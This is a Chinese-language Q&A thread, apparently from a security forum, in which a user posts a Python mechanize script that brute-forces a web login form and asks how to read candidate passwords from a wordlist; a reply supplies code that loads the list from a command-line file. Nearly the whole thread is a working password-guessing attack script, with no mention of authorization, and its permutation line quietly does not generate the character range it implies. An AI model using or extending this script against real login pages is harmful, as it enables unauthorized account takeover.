Passwords 如何从单词列表加载密码以进行web表单登录？

我有一个Python脚本，它使用itertools强制执行web表单（登录）

如何用load-passwords-from-wordlist.txt功能替换bruteforce/字典生成过程

我的代码：

#!/usr/bin/python
import mechanize
import itertools

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

combos = itertools.permutations("a-zA-Z",5)
r = br.open("http://example.com/login")

for x in combos:
    br.select_form(nr = 0)
    br.form['username'] = "my_username_123"
    br.form['password'] = ''.join(x)
    print "Checking ",br.form['password']
    response = br.submit()
    if response.geturl()!="http://example.com/login":
        print "Correct password is ",''.join(x)
        break

---

可以添加类似的内容，因此如果命令行参数中存在密码文件，它将使用该文件而不是预定义列表

示例：python script.py password.txt

---

大家好，欢迎来到信息安全！对我来说，这听起来更像是关于编程（如何使用Python读取文件）的问题，而不是关于安全性的问题。您可以在堆栈溢出时询问，但我怀疑他们希望您在询问之前进行自己的尝试。将“combos=itertools…”替换为“combos=open（'wordlist.txt'）”

import sys
import os

if len(sys.argv) > 1:
    if os.path.exists(sys.argv[1]):
        combos = [line.strip() for line in open(sys.argv[1])]
    else:
        print "[-] File not found"
        sys.exit(0)
else:
        combos = itertools.permutations("a-zA-Z",5)